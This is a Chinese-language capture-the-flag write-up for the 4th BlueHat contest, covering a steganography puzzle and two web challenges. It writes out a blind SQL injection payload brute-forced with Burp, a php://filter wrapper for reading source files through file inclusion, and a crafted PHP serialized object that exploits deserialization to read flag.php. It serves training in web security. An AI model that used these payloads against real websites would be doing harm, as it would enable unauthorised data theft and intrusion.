WP - 4th BlueHat

MISC

签到

首先,用010editor查看图片,发现是gif格式。

1.png

分离出两张图片后,分别使用stegsolve得出flag。

2.png

3.png


WEB

easiestSQLi

4.png

5.png

根据尝试输入得到的回显和提示信息,尝试进行盲注。

6.png

构造payload :
if(ascii(substr((select(flag)from(flag)),1,1))=1,1,2)
利用burp设置注入点,如下。

7.png

攻击脚本设置如下。

8.png

9.png

通过爆破,得到flag{63c84978-ac4f-44de-b4b5-c78786346a35}


Soitgoes

F12查看源码后得到提示信息。

10.png

尝试输入后,有提示。

11.png

构造payload读取源码,/?file=php://filter/read=convert.base64-encode/resource=try.php

通过base64解码出try.php文件。

12.png

同时,重复上述操作,发现存在index.php,获得index.php文件。

13.png

通过分析try.py代码,我们需要反序列号对象。在try.py代码基础上,编写读取flag.php的代码。

14.png

本地运行,得到结果:

Another construction!!O:4:"Seri":1:{s:5:"alize";O:4:"Flag":3:{s:1:"f";s:8:"flag.php";s:2:"t1";s:32:"52bdba949576e6bcec5682a4993bfb58";s:2:"t2";R:4;}}。

构造payload,

?file=try.php&p=O:4:"Seri":1:{s:5:"alize";O:4:"Flag":3:{s:1:"f";s:8:"flag.php";s:2:"t1";s:32:"4da9d7b6d119db4d2d564a2197798380";s:2:"t2";R:4;}}

得到结果。

15.png

本文链接:

https://littlewhite.fun/27.html
1 + 4 =
快来做第一个评论的人吧~